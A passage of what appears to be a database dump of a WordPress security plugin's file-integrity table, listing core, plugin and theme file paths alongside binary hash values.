�o�ny�w�','',0,'?'),('58�d�`S61K>ۮ�v','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cg�ͤa�p�:^���','Z���#��#�z�2�$R�6C����1���','',0,'?'),('5C�)\nWu�꽝/F�cK','wp-includes/js/plupload/wp-plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K%A�};܃q:{��','+8k�����/S*15xB�L6R�P���4�5�','',0,'?'),('5S{�TƁ���e�/�','wp-includes/class-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;C\r��7�l����','q ��MQ�Anq2Y|��]�d�]����R!(�','',0,'?'),('5Xܨ�*���{L0%�','wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Q5�\Z��*y�y!�s','��J���\"qUK�a��\'1�_N�XG�`揧W>','',0,'?'),('5Z����Sμ�v�`6�9','wp-includes/version.php',0,'��|�\ZelǢc�$�\Z','��|�\ZelǢc�$�\Z','H70wN1��_\n�T?a��(-l�]�g��9','',0,'?'),('5\\h>��w ���N�','wp-includes/registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('5`�]\\ͭi\0���\ZJ�T','wp-includes/class-wp-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�����\\�OR���Z','�`7t/���}�z����f!��l=�,�8tS0F�]','',0,'?'),('5k_�wઈ��D���ݐ','wp-content/themes/doctors/core/includes/default_mods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���2�t Z�>d>U�','m%C���^ϗh,��&�qk�����a�k�R','',0,'?'),('5��92���^�%<��','wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4\0��bo���K3{�','����?��bG�,��*>LPmy�������)�Q','',0,'?'),('5�7�N C=��-��c�','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�D�K���zS§0','N�Q�*��TZ%P��%���jܑtZn/�','',0,'?'),('5�#t�5R�шK����','wp-content/wflogs/config-livewaf.php',0,'5��Q\Z]kR�l����','5��Q\Z]kR�l����','sJ�����c�J�{�L������0V;�jbW��','',0,'?'),('5�G�E�|#�\Z�5w�','wp-content/plugins/disable-gutenberg/inc/plugin-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�/@\\*yJ`!�y�6','���Yr�ߎūb�O�^�\n�BZ��b��t','',0,'?'),('5ۺP�f]���4��.Y','wp-content/themes/skt-toothy/images/slides/slider3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�\Z�ಽ<�~�','1墠h��%�]F�G�W��&{_Jv��r]','',0,'?'),('5�!8C,�S���!Y','wp-content/themes/healing-touch/images/social/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�:��\0x��','=�g\Zw9�nMd��������Tٛ�q)��f','',0,'?'),('6����X/��HL','wp-includes/js/mediaelement/wp-playlist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('6c�k���6_sx$�>\"','wp-content/plugins/wp-cerber/assets/flags/et.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8������ZltS���\"','c��/s]\Z�`R��ꩧ`����E�����P�','',0,'?'),('6;I(�H�m�%��f�','wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\n���)�{��','T�=�Y#��[���vr�H�ia��R���','',0,'?'),('6W(\'�����P�4�','wp-content/plugins/wp-cerber/assets/flags/gn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������M�MH����,','����nr���A�[/�Á����*f|DeTJC�J','',0,'?'),('6[f�9�?�� _�','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&���Ɍ����ԔQ<','1���Nߗ����?*�i�í!F�Mp�9^.','',0,'?'),('6c�b��kk��i3�@�H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)VUL��C_�V8�','����EL\r�\";�m[�+G��G��k4+)','',0,'?'),('6�]j�v�W�k\r3-�','wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ft_ov�в���','f�k�!RG4�;��jhnut֭���ʭd\ZW�n','',0,'?'),('6��ƌ���C���+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('6�zxɘ� ,��͢٩','wp-content/themes/weblog/acmethemes/hooks/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P5eP���W�H�Ge��G','�n��oVJ�zO�Z�$\'q�ހ.����&H� �','',0,'?'),('6�����3F�MӏO�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-palette.php',0,'�d�� �M��8���','�d�� �M��8���','6a���Jޘ�ݾ�mm�?�/�e�{�ӆ\0�\r','',0,'?'),('6̠,��_���q��u�','wp-admin/includes/class-wp-filesystem-ftpext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0F������\"��e� ','<̌��ܹW��p�LB o�;$2�ȴ��/%g','',0,'?'),('6٨ �:{�^D�','wp-includes/js/jquery/ui/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('7\"��妿W�\r��ѽ�','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad��_7����$a','�.��ޖ6��I$��LdW�|�]�E�y\"��','',0,'?'),('76�6? X,��-�6�)�','wp-content/plugins/wp-cerber/assets/flags/eu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t;�zC�oػ�@���','��m��2����A�,��%(�#��%c)�+�w','',0,'?'),('7r��uF��@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�K_J�2Cmcͭ�t�','D��jy��,�Lw�a� <U��� ����S','',0,'?'),('7u� j��x�r5���','wp-content/plugins/redirection/locale/redirection-en_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6 \r|��z���`�@E','��IUw8�Ո���(��H8u��eo���\ZL\n','',0,'?'),('7|oOU���z\0Ef���','wp-admin/network/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�;G_bu\'\\','�v,I/L^���ww\ZX1�2�y�T�ɣI��~','',0,'?'),('7�w�\"1��V��rga','wp-content/themes/regina-lite/layout/css/styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�S�t�ǒӘ3f��','���&�L�8]gڙ��kF�*JM?e���','',0,'?'),('7�G�.�{��e���du>','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-icon-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��6�@\ZB��Mc�#','���J$n��F�Q�3��#�dq��y��j�\n�','',0,'?'),('7�R���P���ވ���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-url.php',0,'��\Z]^�W�)�:R','��\Z]^�W�)�:R','�Qg]J����L\'�X%��w�����GN�4','',0,'?'),('7�%Wy~P?�x��','wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('7���o^l�:���B','wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('7�c�¢)��S�eb�','wp-includes/js/jquery/ui/menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\"f_�2�eg�','�{�B��x��\r;f �2��4�/����4E�','',0,'?'),('7�c�.$P!�\"�','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���j��_�ˊR�2','*��-�9�.���HGO6/�L�):�C�d�z�','',0,'?'),('7�ʅ���� ��;h��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iL�v.\\�Mug4�\rf','Ns�:mC������/��Zp�w����z����','',0,'?'),('7���k�X�f�Xm�S�','wp-includes/js/dist/vendor/wp-polyfill-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('7�2��_R�D��;n�','wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�,:�&\0�:�(� ','1�Cf����>�-K�J\"��1�%�I���P3�Z�','',0,'?'),('82�!z��<gh�܃�','wp-content/themes/regina-lite/layout/js/plugins/pace/pace.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\rIn���Z�����','Z�밆Xi��*v#5���t�\'�i�Y��0k','',0,'?'),('8\"�G.M��\'\n��:%','wp-content/themes/vision-lite/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��NO�5VL$�!1(','yRiU9�1��M�Is�/ U��E�=�S�ŬrJ','',0,'?'),('8=�I��a�%��k�~�','wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ο��1S���&�5�F','�),_Ե�DWڪt�q��j\'Oy����>A\\�','',0,'?'),('8?6B�\r��pl2�R�x','wp-content/wflogs/config-synced.php',0,'����d\\+�<Op�','����d\\+�<Op�','4E�:�IXMZ��$dʵqfI��]U�Ɣ��`��','',0,'?'),('8C���T��\n','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/section-repeater/section-repeater-section.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\00�hR�V�����ˠ','(���19�=��wW�j�Q��Wv#w\ri�]��(','',0,'?'),('8F��!�a\0@���d(U','wp-content/themes/doctors/core/includes/custom-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.�G���\n� U�','��P�����ĥ�{�WR,�u��57�\r�S�Q]','',0,'?'),('8P֧�\Z�HGE}8�','wp-includes/Requests/Exception/HTTP/306.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('8V��������x','wp-content/themes/skt-toothy/images/search-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ω�W吃`\0�d��O','�\0��E�8O2�}�\'�y�>��e�(8�8','',0,'?'),('8Y���v���C�[,��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/� @d��\r�+v�*(','',0,'?'),('8�R6�DH��q�-{�:`','wp-admin/includes/translation-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>D�glM�<�mg�','\r�[��8*�5n݊��Pc���^8d%?f','',0,'?'),('8�@)��6yg[y�sQR','wp-admin/css/deprecated-media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��\"z���Pgw','���I�\'�Hk���,���1��5!u�.���2','',0,'?'),('8ÛZE�Q$}UP�T��','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�铇�ܙ~�\r�m','%&��9� /D�XG�؞�߇��U�����4','',0,'?'),('8�Gxo\\��U���[�','wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_����H��o9�{','>����k���Wo��H�[G�.�l)簥0','',0,'?'),('8ܞt��\Zw�Nxa��','wp-includes/class-wp-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('9�\0�]�7�BZ��','wp-content/themes/healthcare/css/font-awesome/scss/_fixed-width.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�id�4ԙ�6���','R`��;�sR6F�[�#���|#쨧������','',0,'?'),('9�\r5\'X���>?�','wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('9֙��&h�Cl��\0�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1��X��X�?��H ','��}O�+���X��۴X����V��a���','',0,'?'),('9ψ[�1d{���@','wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���vz��4�<q\Z�','���/U��V�tD��b}��F�9S��z���','',0,'?'),('9&�\"WQ��OI��-v','wp-content/themes/advance/inc/kirki/assets/js/controls/code.js',0,'=�cC�\Z���7�<\n�','=�cC�\Z���7�<\n�','�� uAO}ؒ�\\FB\\����>�ص���','',0,'?'),('9:��d�o\n��p`Ry��','wp-includes/js/tinymce/langs/wp-langs-en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('9k�sB��=}��TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('9v@�o�nr�����*','wp-content/plugins/wp-cerber/assets/flags/am.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�(v���ߩM�$Cݣn','�c4�n�6W����V�^�:�s��ݺ#����','',0,'?'),('9|����nRo��Bt[�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f����rQ��N�L7\\�','!�/Բ�*<5����E��~��GYy&`��','',0,'?'),('9|��_\\� _o�P�x��','wp-content/themes/weblog/acmethemes/customizer/design-options/sidebar-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?U���`��uI�ho�','=K�kq�ά��:�נƮ�]�w�\"��հi�','',0,'?'),('9�} B^��? �\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',:q���Hn<4���@','���جK��\'��\r<S��K�\"����6i+��9','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\0i�L�1���_��','��{Ո��R3i²�V���J}��0Ʀ�e\'\n �','',0,'?'),('9ĠZq:j\nU�9(\Z\0��','wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�x[��/�؟[�N�','�S���3�hA���Θ����R)�+}�A���6','',0,'?'),('9�<�T:w��Z~�e5��','wp-content/themes/weblog/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9)H�d����','1N�����:�T�X�}������#�����','',0,'?'),('9�6���,r�\\1�TC�[','wp-content/plugins/disable-gutenberg/css/font-icons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�p垑*<O8��$','i�����<��ݍ\nT�@��<��sg����','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�gg��&ёb�� ��','(C<M�d*2Ƚ��*�N�t�n����T~��\ZW','',0,'?'),(':�B3�I���X\'���','wp-content/themes/healthcare/images/portfolio/3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�Ω���D�\\mFt','P|}Q��S�͘��͎�8���B/C�','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[ ?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{9�:=��q��aT��','Fb�EE��sn��>����+�o�F�<Zn�','',0,'?'),(':\\ܹ\r@���L\"�:�U','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eL�F��T�2Ѯ�He','M��D�\nR卸�X����=���j���н','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K;p�O�?F`h�w','�[��7�2��s���d`��������Mo','',0,'?'),(':��q� �������','wp-content/themes/advance/inc/customizer/sections.php',0,'�p+)�j�-����~�','�p+)�j�-����~�','C�!�Z� v�������;N�`9���(`�@5�','',0,'?'),(':�x��3�L&�3ſhD','wp-content/plugins/wp-cerber/assets/flags/mz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����v�)�Q�H�vz','�A�q#7����F�tˎ��Y�\\�j�ň�V:ܯ','',0,'?'),(':�%��(v5��q�0','wp-content/themes/twentytwentyone/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0ײ�O���\r�|��','��a�T��t����.t:��,�v��pڊ\0','',0,'?'),(':�V,�Ē���B��Is','wp-content/themes/skt-toothy/images/location-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ҟ8,�i-\\ta�7�','|.���,5��`�r�Ճ�(���ͤ���Ȗ','',0,'?'),(':�˺�+���u��','wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5]��d��d�f�','��>��`������NN�`�N\"K�Ӟc�kG<;','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^
�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#� n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�Y\0�ys��<M','��-!V��>d�*jP�F� �;QƵ��N1aG�(','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';C_�\n����c�K�','}y�Լ�A�lKnIJH�z&NVc���:[3�@n','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���J��ѡ��πi','���8C���P����/��g�e�TCW_��','',0,'?'),(';Rc��J���,�SA','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԯ�#��ɷ��D��','TH�d�����y��x?� �mP��}6�3V','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';����!M�|�Es��\r','wp-content/themes/doctors/core/contents/loop_attachment/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�R��/���d\0�r�I/','�6w����:�ndh�V�5��k��� 5&�IB�','',0,'?'),(';��?�����','wp-content/themes/doctors/core/customizer/header-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�)���k���YzI�','^\'�ҍ(7�о�]��{�xCk�1������','',0,'?'),(';�4$�z�m�k�����','wp-content/themes/skt-toothy/images/icon-medical2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n�G��aRQ�7<��',' �\'{5�R0��n\r��@��NI˹F��$1','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߣ0�SÂ���7~�:A','�ʼnO��V���%Y��UR�L��Tyh1\Z��G7','',0,'?'),(';��P��!�Jx�B�)Lk','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-slider.php',0,'ϠX�9K$�fҦ�ϡ','ϠX�9K$�fҦ�ϡ','�*��ܖ���,m%����i�[�\"��Ý�C�!','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' #j��2��\'5�!�gM','����϶.�X���po�I3���fY��cMʲ','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y�˖@%��','h66��b�����hS��=��J$���','',0,'?'),('<1*�5̀A\n|�\\���','wp-content/themes/doctors/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���<�Q^����]�','m��匜A�@纵9�\"�!�0��S/�L','',0,'?'),('<AH_0�I\0\Zꑞ��\'','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����(L��zG6�n�','�� D_��S���6m쏼��L�vj�hÊ,�','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<_-|�@iT�����','wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7UE\Z�,�`𫞈Ó~!','�X���Y�8���kcT��W<+���F2�i','',0,'?'),('<a�ґ�z5k��n�','wp-content/plugins/redirection/redirection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�VYwWʑ�~0�V','UD5Ѳ��?��n*��Fʒ7�Xi$_��Zv�;�','',0,'?'),('<y\"v�0p��+\'���','wp-content/plugins/wp-cerber/assets/flags/pw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���k� ���e�','.�ڜ/��V���eR����x���P�i��_','',0,'?'),('<��X��<D?Y�','wp-content/themes/healthcare/home-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hۧ �R�l��\0�51','ث�ܦ�>Z���#|0�ĉ;.�y�e�T 螋U�','',0,'?'),('<�!}K�A�,\r�y�2','wp-content/themes/twentytwentyone/template-parts/header/site-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�z*�-�9�v�Z,��','t���C�����a8f\r*���?�G�\r�G��-','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E.�)��\\�s ��\'','�G4:hu�\'�QN�=;F ״�EQ44��j','',0,'?'),('<��$�C�DO��#��','wp-content/plugins/wp-cerber/assets/flags/fj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���yZd=�\\l���r','C�����ȶ�]�*�s������l湘Jڀ�<e','',0,'?'),('<�hj� �4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<>�6f�chit','wp-content/themes/healing-touch/images/img_404.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z&���{�z�Y9bu','�\"_�9��\r��-�t���y�m\Z�����,��`=','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@���� 4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fRo�l�6��\"���]','�[Z�q�U�r�jM��?O�P��r��t�&','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y?��y*�iE��4}Z','c�����C�Ymd��,�R��p]����rh','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('=�i_��s{LZ�H�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-color-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�ط�����|ỿ��','��CI�b�q�u�Q���n����p������','',0,'?'),('= ]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\'mP��x5KbY.�','i�M�Q�����W\r���d�ɸ���','',0,'?'),('=6�����\Zz�X�{d','wp-content/themes/healthcare/css/font-awesome/less/bordered-pulled.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�2��!���','�+l6\Z�KH1�~�VV ���C�g�p�w;� ','',0,'?'),('=@�}��g\r��Zx[<�','wp-content/themes/twentytwenty/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#f˭�Jlǿ�','I���l2�S���i.k�R�3�}��8V!<�','',0,'?'),('=A��3�����Zi�-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��sn1MQ(��f�','r����J6 